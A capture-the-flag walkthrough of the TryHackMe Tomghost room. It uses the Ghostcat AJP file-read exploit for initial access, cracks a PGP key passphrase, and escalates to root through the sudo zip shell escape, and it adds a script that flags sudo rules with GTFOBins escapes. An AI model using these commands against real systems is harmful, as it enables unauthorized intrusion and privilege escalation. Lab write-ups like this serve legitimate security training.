Tomghost

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn) so the scan still runs if the host drops the ICMP ping probes.

nmap -Pn 10.10.193.3

Detailed Nmap scan against the ports found above.

Command Breakdown:

  • (-sV): Service and version detection

  • (-sC): Run the default NSE scripts

  • (-p): Scan only ports 22, 53, 8009 and 8080

  • (-oN nmap): Save the normal output to a file called nmap

nmap -sV -sC -p 22,53,8009,8080 -oN nmap 10.10.193.3

Enumeration

Let's visit the webserver on port 8080.

It's the default Apache Tomcat/9.0.30 landing page. There is nothing interesting on the page itself, but the exact Tomcat version is worth noting.

Now let's look at the service on port 8009, ajp13. This is the Apache JServ Protocol, a binary protocol used to reverse proxy requests from a front-end web server (typically Apache httpd) to the Tomcat application server. It is meant to be reachable only by that front-end, so finding it exposed to the network directly is a good reason to look for exploits against it.

searchsploit ajp

The second exploit in the list is the one we are looking for: 48143.py, the Ghostcat AJP file read (CVE-2020-1938). Let's read the exploit to see how to use it. To do this we copy it to our working directory.

searchsploit -m multiple/webapps/48143.py

Exploitation

Looking at the exploit, it only needs the IP of the target as its argument. By default it sends a crafted AJP request to port 8009 and reads WEB-INF/web.xml from the default web application.

python 48143.py 10.10.193.3

The returned web.xml contains a username and password. The username is also a local account on the box, so we can use these credentials to log in through SSH.

ssh skyfuck@10.10.193.3

We can read the user flag, which can be located with this command:

find / -type f -name user.txt 2>/dev/null

Privilege Escalation

Looking in the home directory we land in, there are two files.

One is credential.pgp, a PGP (Pretty Good Privacy) encrypted message. The other is tryhackme.asc, an ASCII-armoured PGP key, which is the private key needed to decrypt credential.pgp.

First we import the key, then we try to decrypt the credential.pgp file.

gpg --import tryhackme.asc
gpg --decrypt credential.pgp 

gpg prompts for a passphrase: the private key in tryhackme.asc is itself passphrase-protected. So let's copy the key file to our machine and crack the passphrase with John the Ripper.

scp skyfuck@10.10.193.3:/home/skyfuck/tryhackme.asc .

Next we convert the armoured private key into a john-compatible hash with gpg2john and crack it with the rockyou wordlist.

gpg2john tryhackme.asc > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

John recovers the passphrase: alexandru

Back on the target, we can now decrypt the pgp file, entering that passphrase when prompted.

gpg --decrypt credential.pgp

The decrypted message contains credentials for another user, merlin, so let's switch to that user.

su merlin

Let's run sudo -l to see what we can run as root.

sudo -l

It shows we are allowed to run /usr/bin/zip as root, so let's go to GTFOBins and look up the sudo entry for zip.

The trick relies on two zip options: -T tells zip to test the archive after writing it, and -TT replaces the default test command (unzip -tqq) with the one we supply, appending the archive name to it. With 'sh #' as the test command the appended archive path is commented out, so zip simply runs an interactive sh as root. Once we run these commands we get root.

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
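
As an added example (not part of the original room or this walkthrough), the following shell script automates the triage step above: it reads sudo -l output and flags any permitted binary that has a known GTFOBins sudo shell escape, noting whether the rule is NOPASSWD. The sample sudo -l output, the binary list and the function names are constructed for illustration and are not captured from the target.

```shell
#!/bin/sh
# Added example: triage `sudo -l` output for GTFOBins-style shell escapes.
# Not from the Tomghost room; the sample output, list and names below are
# constructed for illustration.

# Binaries whose GTFOBins "sudo" entry yields a shell (illustrative, not exhaustive).
GTFO_SUDO_SHELLS="zip vim vi find less more awk python python3 perl tar nmap env bash sh"

# Constructed sample of `sudo -l` output in sudo's usual layout.
SAMPLE_SUDO_L='Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
    (root) /usr/bin/ls -l /root'

# Read `sudo -l` output on stdin; print the path of each permitted command,
# one per line, dropping the "(user : group)" runas part, any tags such as
# NOPASSWD: or SETENV:, and any arguments after the path.
sudo_l_commands() {
    sed -n '/may run the following commands/,$p' |
        grep -E '^[[:space:]]*\(' |
        sed -E 's/^[[:space:]]*\([^)]*\)[[:space:]]*//; s/^([A-Z]+:[[:space:]]*)+//' |
        awk '{print $1}'
}

# Return 0 if the basename of $1 is in GTFO_SUDO_SHELLS, 1 otherwise.
is_gtfo_shell() {
    base=$(basename "$1")
    for name in $GTFO_SUDO_SHELLS; do
        [ "$base" = "$name" ] && return 0
    done
    return 1
}

# Read `sudo -l` output on stdin; print each risky command, with NOPASSWD
# appended when the rule needs no password (the zip case in this room).
sudo_l_triage() {
    input=$(cat)
    printf '%s\n' "$input" | sudo_l_commands | while IFS= read -r cmd; do
        is_gtfo_shell "$cmd" || continue
        if printf '%s\n' "$input" | grep -Eq "NOPASSWD:.*$cmd"; then
            printf '%s NOPASSWD\n' "$cmd"
        else
            printf '%s\n' "$cmd"
        fi
    done
}

# Usage on a real box: sudo -l | sudo_l_triage
# Here it is run against the constructed sample instead.
printf '%s\n' "$SAMPLE_SUDO_L" | sudo_l_triage
```

On the sample input the script reports only /usr/bin/zip, marked NOPASSWD; /usr/bin/ls is permitted but not flagged because it has no shell escape. The list is a starting point, not a substitute for reading the GTFOBins entry for each hit.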

We are now root and can read root.txt to answer the last question of the room.
